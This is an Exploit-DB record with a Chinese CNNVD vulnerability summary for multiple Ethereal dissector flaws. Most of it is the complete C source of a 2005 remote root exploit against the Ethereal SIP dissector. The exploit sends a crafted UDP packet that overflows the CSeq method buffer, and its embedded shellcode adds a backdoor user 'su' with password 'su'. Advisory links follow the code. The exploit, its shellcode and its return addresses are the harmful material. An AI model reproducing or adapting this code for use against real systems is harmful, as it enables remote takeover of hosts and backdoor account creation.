https://www.exploit-db.com/exploits/1021
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-929

Ethereal是一款非常流行的网络协议分析工具。Ethereal厂商报告了各种协议处理模块中的多个漏洞，包括：-缓冲区溢出漏洞-格式串漏洞-空指针引用拒绝服务漏洞-分段错误拒绝服务漏洞-死循环漏洞-内存耗尽拒绝服务漏洞-双重释放漏洞-未明的拒绝服务漏洞这些漏洞可能允许远程攻击者执行任意代码或导致受影响的应用程序崩溃。

/* tethereal_sip.c (now quite functional)
*
* Ethereal (0.10.0 to 0.10.10) SIP Dissector remote root exploit
*
* Advisory: 
* http://www.ethereal.com/appnotes/enpa-sa-00019.html
* 
* produced by Team W00dp3ck3r:
* fraukx41iser
* mag00n
* s00n
* thorben
* 
* Notes:
* tested on Debian Sarge 
* Linux maggot4 2.6.8-1-386 #1 Mon Sep 13 23:29:55 EDT 2004 i686 GNU/Linux
*
* tested version of ethereal:
* http://www.ethereal.com/distribution/all-versions/ethereal-0.10.10.tar.gz
* (./configure, make, make install ;))
* 
* victim has to switch from normal user to root using "su -" 
* the exploit adds a user named "su" with password "su" on the victim host
* 
*/


#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>


unsigned char sip_header[] = 
"x4fx50x54x49x4fx4ex53x20x73x69x70x3ax68x61x63"
"x6bx20x53x49x50x2fx32x2ex30x0ax56x69x61x3ax20"
"x53x49x50x2fx32x2ex30x2fx55x44x50x20x63x70x63"
"x31x2dx6dx61x72x73x31x2dx33x2dx30x2dx63x75x73"
"x74x32x32x35x2ex6dx69x64x64x2ex63x61x62x6cx65"
"x2ex6ex74x6cx2ex63x6fx6dx3ax35x35x31x31x38x3b"
"x72x70x6fx72x74x0dx0ax56x69x61x3ax20x53x49x50"
"x2fx32x2ex30x2fx55x44x50x20x68x61x63x6bx3ax39"
"x0ax46x72x6fx6dx3ax20x73x69x70x3ax68x61x63x6b"
"x3bx74x61x67x3dx36x31x35x61x65x37x37x30x0ax54"
"x6fx3ax20x73x69x70x3ax68x61x63x6b";

unsigned char callid[] =
"x0ax43x61x6cx6cx2dx49x44x3ax20";


/* adduser shellcode, user: "su", pwd: "su" Full Size=116, splitted into 
2 parts because one buffer was too small. thx to http://metasploit.com */
unsigned char shellcode[] =
"x31xc9x83xe9xe9xd9xeexd9x74x24xf4x5bx81x73x13xa5"
"xb7x95xbbx83xebxfcxe2xf4x94x7ex1cx70xcfxf1xcdx76"
"x25xddx90xe3x94x7exc4xd3xd6xc4xe2xdfxcdx98xbaxcb"
"xc4xdfxbaxdexd1xd4x1cx58xe4x02x91x76x25x24x7dx9b"
"xa5xb7x95xc8xd0x8dxd4xfaxdfxf2xacxd4xd4xf9xddxed"
"xf5x82xe6x81x95x8dxa5x81x9fx98xafx94xc7xdexfbx94"
"xd6xdfx9fxe2x2exe6";


unsigned char cseq[] = 
"x0ax43x53x65x71x3ax20";

/* the malformed cseq method field. the buffer has a size of 16 byte. you need 
48 byte to overwrite the return address. the first byte is checked isalpha(), 
so we splitted the shellcode in a way that the first char of cseq_method passes
the isalpha() check. */ 
unsigned char cseq_method[] = 
"x69xd1xa1xefx58x3bxcfxb6xcdx76x25xb7x95xbb";


/* needed to be a fully valid sip packet */
unsigned char sip_footer[] =
"x0ax43x6fx6ex74x61x63x74x3ax20x68x61x63x6bx3a"
"x39x0ax43x6fx6ex74x65x6ex74x2dx4cx65x6ex67x74"
"x68x3ax20x30x0ax4dx61x78x2dx46x6fx72x77x61x72"
"x64x73x3ax20x37x30x0ax55x73x65x72x2dx41x67x65"
"x6ex74x3ax20x57x30x30x64x70x33x63x6bx33x72x20"
"x0a";



int main(int argc, char * argv[]) {
unsigned int i, offset, ret, p_addr;
struct sockaddr_in dest;
struct hostent *he;
int sock, slen = sizeof(struct sockaddr);
unsigned char buffer[2048];

// help output
if(argc < 3) {
printf("correct syntax: %s <flag> <host> n", argv[0]);
printf("possible flag: n");
printf("1 the ethereal user has started tethereal" 
"with full path as root n");
printf("2 the ethereal user has started tethereal" 
"without directorypath as root n");
return 1;
}

// p_addr may differ on other systems ;)
if (argv[1][0] == '1') {
p_addr = 0xbffee328;
}

if (argv[1][0] == '2') {
p_addr = 0xbffee338;
}

// destination-ip check
if((he = gethostbyname(argv[2])) == NULL) {
printf("[!] Couldn't resolve %sn", argv[2]);
return 1;
}

// open socket
if((sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0) {
perror("socket()");
return 1;
}

// set packet parameters
dest.sin_port = htons(5060);
dest.sin_family = AF_INET;
dest.sin_addr = *((struct in_addr *)he->h_addr);

// set the returnaddress (may differ on other systems)
ret = 0xbffee240; 


//// generate a buffer containing the data ////
offset = 0;

// set all values of the buffer to 0x0
memset(buffer, 0x0, sizeof(buffer));

// copy the header into the buffer
memcpy(buffer+offset, sip_header, sizeof(sip_header)); 
offset += sizeof(sip_header) -1;

// concat the callid into the buffer
memcpy(buffer+offset, callid, sizeof(callid)); 
offset += sizeof(callid) -1;

// add the callid-value (nop+shellcode)
i = 128 - sizeof(shellcode) +1; 
memset(buffer+offset, 0x90, i);
offset += i;

// insert shellcode into buffer
memcpy(buffer+offset, shellcode, sizeof(shellcode));
offset += sizeof(shellcode) -1; 


// concat the cseq
memcpy(buffer+offset, cseq, sizeof(cseq)); 
offset += sizeof(cseq) -1;

// generate the part, which causes the overflow (=cseq-method)
memcpy(buffer+offset, cseq_method, sizeof(cseq_method)); 
offset += sizeof(cseq_method) -1; 

// fill the rest of cseq_method with A
memset(buffer+offset, 0x41, 30);
offset += 30; 
// write return address
*(long *)&buffer[offset] = ret; 
offset += 4;

// repair the first pointer after ret- address
*(long *)&buffer[offset] = 0x08215184; // is a pointer DEST-value: 0x1
offset += 4;
// repair second pointer after ret- address 
*(long *)&buffer[offset] = p_addr;
offset += 4; 

// the finalising part of the message
memcpy(buffer+offset, sip_footer, sizeof(sip_footer)); 

// send the buffer to the victim
if (sendto(sock, buffer, sizeof(buffer), 0, 
(struct sockaddr *)&dest, slen)== -1) {
printf("[!] Error sending packet!n");
return 1;
}

// DEBUG //
// printf("%sn", buffer);

printf("[*] dark W00dp3ck3r packet sent!n");
close(sock);
return 0;

}

// milw0rm.com [2005-05-31]

来源:www.ethereal.com
链接:http://www.ethereal.com/news/item_20050504_01.html
来源:www.ethereal.com
链接:http://www.ethereal.com/appnotes/enpa-sa-00019.html
来源:BID
名称:13504
链接:http://www.securityfocus.com/bid/13504
来源:REDHAT
名称:RHSA-2005:427
链接:http://www.redhat.com/support/errata/RHSA-2005-427.html
来源:FEDORA
名称:FLSA-2006:152922
链接:http://www.redhat.com/archives/fedora-legacy-announce/2006-January/msg00003.html
来源:CONECTIVA
名称:CLSA-2005:963
链接:http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio;=000963